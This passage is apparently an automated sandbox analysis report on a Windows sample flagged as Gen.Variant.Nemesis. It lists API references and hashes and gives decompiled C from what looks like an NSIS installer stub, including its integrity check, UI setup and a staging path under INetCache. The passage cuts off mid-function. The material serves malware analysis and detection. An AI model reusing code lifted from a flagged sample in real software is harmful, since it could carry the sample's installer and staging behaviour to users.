                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404030
                                                                          • EnableMenuItem.USER32(00000000), ref: 00404037
                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040404F
                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404062
                                                                          • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 0040408C
                                                                          • SetWindowTextW.USER32(?,0042D248), ref: 004040A0
                                                                          • ShowWindow.USER32(?,0000000A), ref: 004041D4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                          • String ID:
                                                                          • API String ID: 3282139019-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph (function 00403990; legend: Executed / Not Executed)
                                                                          C-Code - Quality: 96%
                                                                          			E00403990(void* __eflags) {
                                                                          				intOrPtr _v4;
                                                                          				intOrPtr _v8;
                                                                          				int _v12;
                                                                          				void _v16;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				intOrPtr* _t22;
                                                                          				void* _t30;
                                                                          				void* _t32;
                                                                          				int _t33;
                                                                          				void* _t36;
                                                                          				int _t39;
                                                                          				int _t40;
                                                                          				int _t44;
                                                                          				short _t63;
                                                                          				WCHAR* _t65;
                                                                          				signed char _t69;
                                                                          				signed short _t73;
                                                                          				WCHAR* _t76;
                                                                          				intOrPtr _t82;
                                                                          				WCHAR* _t87;
                                                                          
                                                                          				_t82 =  *0x434ef4;
                                                                          				_t22 = E0040665C(2);
                                                                          				_t90 = _t22;
                                                                          				if(_t22 == 0) {
                                                                          					_t76 = 0x42d248;
                                                                          					L"1033" = 0x30;
                                                                          					 *0x441002 = 0x78;
                                                                          					 *0x441004 = 0;
                                                                          					E00406150(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d248, 0);
                                                                          					__eflags =  *0x42d248;
                                                                          					if(__eflags == 0) {
                                                                          						E00406150(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083CC, 0x42d248, 0);
                                                                          					}
                                                                          					lstrcatW(L"1033", _t76);
                                                                          				} else {
                                                                          					_t73 =  *_t22(); // executed
                                                                          					E004061C9(L"1033", _t73 & 0x0000ffff);
                                                                          				}
                                                                          				E00403C66(_t78, _t90);
                                                                          				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ligtorn\\Pantry";
                                                                          				 *0x434f80 =  *0x434efc & 0x00000020;
                                                                          				 *0x434f9c = 0x10000;
                                                                          				if(E00405C5B(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ligtorn\\Pantry") != 0) {
                                                                          					L16:
                                                                          					if(E00405C5B(_t98, _t86) == 0) {
                                                                          						E004062A4(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
                                                                          					}
                                                                          					_t30 = LoadImageW( *0x434ee0, 0x67, 1, 0, 0, 0x8040); // executed
                                                                          					 *0x433ec8 = _t30;
                                                                          					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                                          						L21:
                                                                          						if(E0040140B(0) == 0) {
                                                                          							_t32 = E00403C66(_t78, __eflags);
                                                                          							__eflags =  *0x434fa0;
                                                                          							if( *0x434fa0 != 0) {
                                                                          								_t33 = E004053B9(_t32, 0);
                                                                          								__eflags = _t33;
                                                                          								if(_t33 == 0) {
                                                                          									E0040140B(1);
                                                                          									goto L33;
                                                                          								}
                                                                          								__eflags =  *0x433eac;
                                                                          								if( *0x433eac == 0) {
                                                                          									E0040140B(2);
                                                                          								}
                                                                          								goto L22;
                                                                          							}
                                                                          							ShowWindow( *0x42d228, 5); // executed
                                                                          							_t39 = E004065EC("RichEd20"); // executed
                                                                          							__eflags = _t39;
                                                                          							if(_t39 == 0) {
                                                                          								E004065EC("RichEd32");
                                                                          							}
                                                                          							_t87 = L"RichEdit20W";
                                                                          							_t40 = GetClassInfoW(0, _t87, 0x433e80);
                                                                          							__eflags = _t40;
                                                                          							if(_t40 == 0) {
                                                                          								GetClassInfoW(0, L"RichEdit", 0x433e80);
                                                                          								 *0x433ea4 = _t87;
                                                                          								RegisterClassW(0x433e80);
                                                                          							}
                                                                          							_t44 = DialogBoxParamW( *0x434ee0,  *0x433ec0 + 0x00000069 & 0x0000ffff, 0, E00403D3E, 0); // executed
                                                                          							E004038E0(E0040140B(5), 1);
                                                                          							return _t44;
                                                                          						}
                                                                          						L22:
                                                                          						_t36 = 2;
                                                                          						return _t36;
                                                                          					} else {
                                                                          						_t78 =  *0x434ee0;
                                                                          						 *0x433e84 = E00401000;
                                                                          						 *0x433e90 =  *0x434ee0;
                                                                          						 *0x433e94 = _t30;
                                                                          						 *0x433ea4 = 0x40a380;
                                                                          						if(RegisterClassW(0x433e80) == 0) {
                                                                          							L33:
                                                                          							__eflags = 0;
                                                                          							return 0;
                                                                          						}
                                                                          						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                                          						 *0x42d228 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434ee0, 0);
                                                                          						goto L21;
                                                                          					}
                                                                          				} else {
                                                                          					_t78 =  *(_t82 + 0x48);
                                                                          					_t92 = _t78;
                                                                          					if(_t78 == 0) {
                                                                          						goto L16;
                                                                          					}
                                                                          					_t76 = 0x432e80;
                                                                          					E00406150(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432e80, 0);
                                                                          					_t63 =  *0x432e80; // 0x43
                                                                          					if(_t63 == 0) {
                                                                          						goto L16;
                                                                          					}
                                                                          					if(_t63 == 0x22) {
                                                                          						_t76 = 0x432e82;
                                                                          						 *((short*)(E00405B80(0x432e82, 0x22))) = 0;
                                                                          					}
                                                                          					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                                          					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                                          						L15:
                                                                          						E00406282(_t86, E00405B53(_t76));
                                                                          						goto L16;
                                                                          					} else {
                                                                          						_t69 = GetFileAttributesW(_t76);
                                                                          						if(_t69 == 0xffffffff) {
                                                                          							L14:
                                                                          							E00405B9F(_t76);
                                                                          							goto L15;
                                                                          						}
                                                                          						_t98 = _t69 & 0x00000010;
                                                                          						if((_t69 & 0x00000010) != 0) {
                                                                          							goto L15;
                                                                          						}
                                                                          						goto L14;
                                                                          					}
                                                                          				}
                                                                          			}


























                                                                          APIs
                                                                            • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                                            • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                                          • GetUserDefaultUILanguage.KERNELBASE(00000002,C:\Users\user\AppData\Local\Temp\,75523420,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe",00000000), ref: 004039AA
                                                                            • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                                          • lstrcatW.KERNEL32(1033,0042D248), ref: 00403A11
                                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A91
                                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403AA4
                                                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403AAF
                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry), ref: 00403AF8
                                                                          • RegisterClassW.USER32(00433E80), ref: 00403B35
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B4D
                                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B82
                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403BB8
                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BE4
                                                                          • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403BF1
                                                                          • RegisterClassW.USER32(00433E80), ref: 00403BFA
                                                                          • DialogBoxParamW.USER32(?,00000000,00403D3E,00000000), ref: 00403C19
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                          • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                          • API String ID: 606308-2337917425
                                                                          • Opcode ID: d13a808758802c6e3fc48dc76d19d1d1e2605ae81d2ad2d57bfa7261d619400b
                                                                          • Instruction ID: b69a5953a59a380dedfc974e339360e26c19c43312473aa69c5b527d033ca56b
                                                                          • Opcode Fuzzy Hash: d13a808758802c6e3fc48dc76d19d1d1e2605ae81d2ad2d57bfa7261d619400b
                                                                          • Instruction Fuzzy Hash: 7061A8312003006ED320BF669D46F673A6CEB84B5AF40053FF945B62E2DB7DA9418A2D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 368 402ec1-402f0f GetTickCount GetModuleFileNameW call 405d74 371 402f11-402f16 368->371 372 402f1b-402f49 call 406282 call 405b9f call 406282 GetFileSize 368->372 373 4030f3-4030f7 371->373 380 403036-403044 call 402e5d 372->380 381 402f4f 372->381 387 403046-403049 380->387 388 403099-40309e 380->388 383 402f54-402f6b 381->383 385 402f6d 383->385 386 402f6f-402f78 call 403315 383->386 385->386 395 4030a0-4030a8 call 402e5d 386->395 396 402f7e-402f85 386->396 390 40304b-403063 call 40332b call 403315 387->390 391 40306d-403097 GlobalAlloc call 40332b call 4030fa 387->391 388->373 390->388 419 403065-40306b 390->419 391->388 417 4030aa-4030bb 391->417 395->388 397 403001-403005 396->397 398 402f87-402f9b call 405d2f 396->398 405 403007-40300e call 402e5d 397->405 406 40300f-403015 397->406 398->406 415 402f9d-402fa4 398->415 405->406 408 403024-40302e 406->408 409 403017-403021 call 40674f 406->409 408->383 416 403034 408->416 409->408 415->406 421 402fa6-402fad 415->421 416->380 422 4030c3-4030c8 417->422 423 4030bd 417->423 419->388 419->391 421->406 424 402faf-402fb6 421->424 425 4030c9-4030cf 422->425 423->422 424->406 426 402fb8-402fbf 424->426 425->425 427 4030d1-4030ec SetFilePointer call 405d2f 425->427 426->406 428 402fc1-402fe1 426->428 431 4030f1 427->431 428->388 430 402fe7-402feb 428->430 432 402ff3-402ffb 430->432 433 402fed-402ff1 430->433 431->373 432->406 434 402ffd-402fff 432->434 433->416 433->432 434->406
                                                                          C-Code - Quality: 80%
                                                                          			E00402EC1(void* __eflags, signed int _a4) {
                                                                          				DWORD* _v8;
                                                                          				DWORD* _v12;
                                                                          				void* _v16;
                                                                          				intOrPtr _v20;
                                                                          				long _v24;
                                                                          				intOrPtr _v28;
                                                                          				intOrPtr _v32;
                                                                          				intOrPtr _v36;
                                                                          				intOrPtr _v40;
                                                                          				signed int _v44;
                                                                          				long _t43;
                                                                          				signed int _t50;
                                                                          				void* _t53;
                                                                          				void* _t57;
                                                                          				intOrPtr* _t59;
                                                                          				long _t60;
                                                                          				signed int _t65;
                                                                          				signed int _t70;
                                                                          				signed int _t71;
                                                                          				signed int _t77;
                                                                          				intOrPtr _t80;
                                                                          				long _t82;
                                                                          				signed int _t85;
                                                                          				signed int _t87;
                                                                          				void* _t89;
                                                                          				signed int _t90;
                                                                          				signed int _t93;
                                                                          				void* _t94;
                                                                          
                                                                          				_t82 = 0;
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
                                                                          				_t43 = GetTickCount();
                                                                          				_t91 = L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe";
                                                                          				 *0x434ef0 = _t43 + 0x3e8;
                                                                          				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe", 0x400);
                                                                          				_t89 = E00405D74(_t91, 0x80000000, 3);
                                                                          				_v16 = _t89;
                                                                          				 *0x40a018 = _t89;
                                                                          				if(_t89 == 0xffffffff) {
                                                                          					return L"Error launching installer";
                                                                          				}
                                                                          				_t92 = L"C:\\Users\\Arthur\\Desktop";
                                                                          				E00406282(L"C:\\Users\\Arthur\\Desktop", _t91);
                                                                          				E00406282(0x443000, E00405B9F(_t92));
                                                                          				_t50 = GetFileSize(_t89, 0);
                                                                          				__eflags = _t50;
                                                                          				 *0x422a04 = _t50;
                                                                          				_t93 = _t50;
                                                                          				if(_t50 <= 0) {
                                                                          					L24:
                                                                          					E00402E5D(1);
                                                                          					__eflags =  *0x434ef8 - _t82;
                                                                          					if( *0x434ef8 == _t82) {
                                                                          						goto L29;
                                                                          					}
                                                                          					__eflags = _v8 - _t82;
                                                                          					if(_v8 == _t82) {
                                                                          						L28:
                                                                          						_t53 = GlobalAlloc(0x40, _v24); // executed
                                                                          						_t94 = _t53;
                                                                          						E0040332B( *0x434ef8 + 0x1c);
                                                                          						_push(_v24);
                                                                          						_push(_t94);
                                                                          						_push(_t82);
                                                                          						_push(0xffffffff); // executed
                                                                          						_t57 = E004030FA(); // executed
                                                                          						__eflags = _t57 - _v24;
                                                                          						if(_t57 == _v24) {
                                                                          							__eflags = _v44 & 0x00000001;
                                                                          							 *0x434ef4 = _t94;
                                                                          							 *0x434efc =  *_t94;
                                                                          							if((_v44 & 0x00000001) != 0) {
                                                                          								 *0x434f00 =  *0x434f00 + 1;
                                                                          								__eflags =  *0x434f00;
                                                                          							}
                                                                          							_t40 = _t94 + 0x44; // 0x44
                                                                          							_t59 = _t40;
                                                                          							_t85 = 8;
                                                                          							do {
                                                                          								_t59 = _t59 - 8;
                                                                          								 *_t59 =  *_t59 + _t94;
                                                                          								_t85 = _t85 - 1;
                                                                          								__eflags = _t85;
                                                                          							} while (_t85 != 0);
                                                                          							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                                          							 *(_t94 + 0x3c) = _t60;
                                                                          							E00405D2F(0x434f20, _t94 + 4, 0x40);
                                                                          							__eflags = 0;
                                                                          							return 0;
                                                                          						}
                                                                          						goto L29;
                                                                          					}
                                                                          					E0040332B( *0x4169f8);
                                                                          					_t65 = E00403315( &_a4, 4);
                                                                          					__eflags = _t65;
                                                                          					if(_t65 == 0) {
                                                                          						goto L29;
                                                                          					}
                                                                          					__eflags = _v12 - _a4;
                                                                          					if(_v12 != _a4) {
                                                                          						goto L29;
                                                                          					}
                                                                          					goto L28;
                                                                          				} else {
                                                                          					do {
                                                                          						_t90 = _t93;
                                                                          						asm("sbb eax, eax");
                                                                          						_t70 = ( ~( *0x434ef8) & 0x00007e00) + 0x200;
                                                                          						__eflags = _t93 - _t70;
                                                                          						if(_t93 >= _t70) {
                                                                          							_t90 = _t70;
                                                                          						}
                                                                          						_t71 = E00403315(0x422a08, _t90);
                                                                          						__eflags = _t71;
                                                                          						if(_t71 == 0) {
                                                                          							E00402E5D(1);
                                                                          							L29:
                                                                          							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                          						}
                                                                          						__eflags =  *0x434ef8;
                                                                          						if( *0x434ef8 != 0) {
                                                                          							__eflags = _a4 & 0x00000002;
                                                                          							if((_a4 & 0x00000002) == 0) {
                                                                          								E00402E5D(0);
                                                                          							}
                                                                          							goto L20;
                                                                          						}
                                                                          						E00405D2F( &_v44, 0x422a08, 0x1c);
                                                                          						_t77 = _v44;
                                                                          						__eflags = _t77 & 0xfffffff0;
                                                                          						if((_t77 & 0xfffffff0) != 0) {
                                                                          							goto L20;
                                                                          						}
                                                                          						__eflags = _v40 - 0xdeadbeef;
                                                                          						if(_v40 != 0xdeadbeef) {
                                                                          							goto L20;
                                                                          						}
                                                                          						__eflags = _v28 - 0x74736e49;
                                                                          						if(_v28 != 0x74736e49) {
                                                                          							goto L20;
                                                                          						}
                                                                          						__eflags = _v32 - 0x74666f73;
                                                                          						if(_v32 != 0x74666f73) {
                                                                          							goto L20;
                                                                          						}
                                                                          						__eflags = _v36 - 0x6c6c754e;
                                                                          						if(_v36 != 0x6c6c754e) {
                                                                          							goto L20;
                                                                          						}
                                                                          						_a4 = _a4 | _t77;
                                                                          						_t87 =  *0x4169f8; // 0x81503
                                                                          						 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
                                                                          						_t80 = _v20;
                                                                          						__eflags = _t80 - _t93;
                                                                          						 *0x434ef8 = _t87;
                                                                          						if(_t80 > _t93) {
                                                                          							goto L29;
                                                                          						}
                                                                          						__eflags = _a4 & 0x00000008;
                                                                          						if((_a4 & 0x00000008) != 0) {
                                                                          							L16:
                                                                          							_v8 = _v8 + 1;
                                                                          							_t24 = _t80 - 4; // 0x40a2dc
                                                                          							_t93 = _t24;
                                                                          							__eflags = _t90 - _t93;
                                                                          							if(_t90 > _t93) {
                                                                          								_t90 = _t93;
                                                                          							}
                                                                          							goto L20;
                                                                          						}
                                                                          						__eflags = _a4 & 0x00000004;
                                                                          						if((_a4 & 0x00000004) != 0) {
                                                                          							break;
                                                                          						}
                                                                          						goto L16;
                                                                          						L20:
                                                                          						__eflags = _t93 -  *0x422a04; // 0x81c18
                                                                          						if(__eflags < 0) {
                                                                          							_v12 = E0040674F(_v12, 0x422a08, _t90);
                                                                          						}
                                                                          						 *0x4169f8 =  *0x4169f8 + _t90;
                                                                          						_t93 = _t93 - _t90;
                                                                          						__eflags = _t93;
                                                                          					} while (_t93 > 0);
                                                                          					_t82 = 0;
                                                                          					__eflags = 0;
                                                                          					goto L24;
                                                                          				}
                                                                          			}
































                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00402ED2
                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                                            • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                                            • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                                          • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                                          Strings
                                                                          • Error launching installer, xrefs: 00402F11
                                                                          • Null, xrefs: 00402FB8
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402ECB
                                                                          • Inst, xrefs: 00402FA6
                                                                          • C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, xrefs: 00402ED8, 00402EE7, 00402EFB, 00402F1B
                                                                          • soft, xrefs: 00402FAF
                                                                          • C:\Users\user\Desktop, xrefs: 00402F1C, 00402F21, 00402F27
                                                                          • "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe", xrefs: 00402EC1
                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403099
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                          • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                          • API String ID: 4283519449-3518573332
                                                                          • Opcode ID: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
                                                                          • Instruction ID: 5fb561c1f1da7fe65fe29aa304fda9dad36d264b5387f138e6185790fd874317
                                                                          • Opcode Fuzzy Hash: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
                                                                          • Instruction Fuzzy Hash: 18510471902216AFDB20AF64DD85B9E7EB8FB00359F15403BF904B62C5C7789E408B6C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph
                                                                          [Control-flow graph of function 004062A4]
                                                                          C-Code - Quality: 72%
                                                                          			E004062A4(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                          				signed int _v8;
                                                                          				struct _ITEMIDLIST* _v12;
                                                                          				signed int _v16;
                                                                          				signed int _v20;
                                                                          				signed int _v24;
                                                                          				signed int _v28;
                                                                          				signed int _t43;
                                                                          				WCHAR* _t44;
                                                                          				signed char _t46;
                                                                          				signed int _t47;
                                                                          				signed int _t48;
                                                                          				short _t58;
                                                                          				short _t60;
                                                                          				short _t62;
                                                                          				void* _t70;
                                                                          				signed int _t76;
                                                                          				void* _t82;
                                                                          				signed char _t83;
                                                                          				short _t86;
                                                                          				signed int _t96;
                                                                          				void* _t102;
                                                                          				short _t103;
                                                                          				signed int _t106;
                                                                          				signed int _t108;
                                                                          				void* _t109;
                                                                          				WCHAR* _t110;
                                                                          				void* _t112;
                                                                          
                                                                          				_t109 = __esi;
                                                                          				_t102 = __edi;
                                                                          				_t70 = __ebx;
                                                                          				_t43 = _a8;
                                                                          				if(_t43 < 0) {
                                                                          					_t43 =  *( *0x433ebc - 4 + _t43 * 4);
                                                                          				}
                                                                          				_push(_t70);
                                                                          				_push(_t109);
                                                                          				_push(_t102);
                                                                          				_t96 =  *0x434f38 + _t43 * 2;
                                                                          				_t44 = 0x432e80;
                                                                          				_t110 = 0x432e80;
                                                                          				if(_a4 >= 0x432e80 && _a4 - 0x432e80 >> 1 < 0x800) {
                                                                          					_t110 = _a4;
                                                                          					_a4 = _a4 & 0x00000000;
                                                                          				}
                                                                          				while(1) {
                                                                          					_t103 =  *_t96;
                                                                          					if(_t103 == 0) {
                                                                          						break;
                                                                          					}
                                                                          					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x800;
                                                                          					if((_t110 - _t44 & 0xfffffffe) >= 0x800) {
                                                                          						break;
                                                                          					}
                                                                          					_t82 = 2;
                                                                          					_t96 = _t96 + _t82;
                                                                          					__eflags = _t103 - 4;
                                                                          					_a8 = _t96;
                                                                          					if(__eflags >= 0) {
                                                                          						if(__eflags != 0) {
                                                                          							 *_t110 = _t103;
                                                                          							_t110 = _t110 + _t82;
                                                                          							__eflags = _t110;
                                                                          						} else {
                                                                          							 *_t110 =  *_t96;
                                                                          							_t110 = _t110 + _t82;
                                                                          							_t96 = _t96 + _t82;
                                                                          						}
                                                                          						continue;
                                                                          					}
                                                                          					_t83 =  *((intOrPtr*)(_t96 + 1));
                                                                          					_t46 =  *_t96;
                                                                          					_t47 = _t46 & 0x000000ff;
                                                                          					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
                                                                          					_a8 = _a8 + 2;
                                                                          					_v28 = _t47 | 0x00008000;
                                                                          					_v24 = _t47;
                                                                          					_t76 = _t83 & 0x000000ff;
                                                                          					_v16 = _t76;
                                                                          					__eflags = _t103 - 2;
                                                                          					_v20 = _t76 | 0x00008000;
                                                                          					if(_t103 != 2) {
                                                                          						__eflags = _t103 - 3;
                                                                          						if(_t103 != 3) {
                                                                          							__eflags = _t103 - 1;
                                                                          							if(_t103 == 1) {
                                                                          								__eflags = (_t47 | 0xffffffff) - _v8;
                                                                          								E004062A4(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
                                                                          							}
                                                                          							L43:
                                                                          							_t48 = lstrlenW(_t110);
                                                                          							_t96 = _a8;
                                                                          							_t110 =  &(_t110[_t48]);
                                                                          							_t44 = 0x432e80;
                                                                          							continue;
                                                                          						}
                                                                          						_t106 = _v8;
                                                                          						__eflags = _t106 - 0x1d;
                                                                          						if(_t106 != 0x1d) {
                                                                          							__eflags = (_t106 << 0xb) + 0x435000;
                                                                          							E00406282(_t110, (_t106 << 0xb) + 0x435000);
                                                                          						} else {
                                                                          							E004061C9(_t110,  *0x434ee8);
                                                                          						}
                                                                          						__eflags = _t106 + 0xffffffeb - 7;
                                                                          						if(_t106 + 0xffffffeb < 7) {
                                                                          							L34:
                                                                          							E00406516(_t110);
                                                                          						}
                                                                          						goto L43;
                                                                          					}
                                                                          					_t86 =  *0x434eec;
                                                                          					__eflags = _t86;
                                                                          					_t108 = 2;
                                                                          					if(_t86 >= 0) {
                                                                          						L13:
                                                                          						_v8 = 1;
                                                                          						L14:
                                                                          						__eflags =  *0x434f84;
                                                                          						if( *0x434f84 != 0) {
                                                                          							_t108 = 4;
                                                                          						}
                                                                          						__eflags = _t47;
                                                                          						if(__eflags >= 0) {
                                                                          							__eflags = _t47 - 0x25;
                                                                          							if(_t47 != 0x25) {
                                                                          								__eflags = _t47 - 0x24;
                                                                          								if(_t47 == 0x24) {
                                                                          									GetWindowsDirectoryW(_t110, 0x400);
                                                                          									_t108 = 0;
                                                                          								}
                                                                          								while(1) {
                                                                          									__eflags = _t108;
                                                                          									if(_t108 == 0) {
                                                                          										goto L30;
                                                                          									}
                                                                          									_t58 =  *0x434ee4;
                                                                          									_t108 = _t108 - 1;
                                                                          									__eflags = _t58;
                                                                          									if(_t58 == 0) {
                                                                          										L26:
                                                                          										_t60 = SHGetSpecialFolderLocation( *0x434ee8,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
                                                                          										__eflags = _t60;
                                                                          										if(_t60 != 0) {
                                                                          											L28:
                                                                          											 *_t110 =  *_t110 & 0x00000000;
                                                                          											__eflags =  *_t110;
                                                                          											continue;
                                                                          										}
                                                                          										__imp__SHGetPathFromIDListW(_v12, _t110);
                                                                          										__imp__CoTaskMemFree(_v12);
                                                                          										__eflags = _t60;
                                                                          										if(_t60 != 0) {
                                                                          											goto L30;
                                                                          										}
                                                                          										goto L28;
                                                                          									}
                                                                          									__eflags = _v8;
                                                                          									if(_v8 == 0) {
                                                                          										goto L26;
                                                                          									}
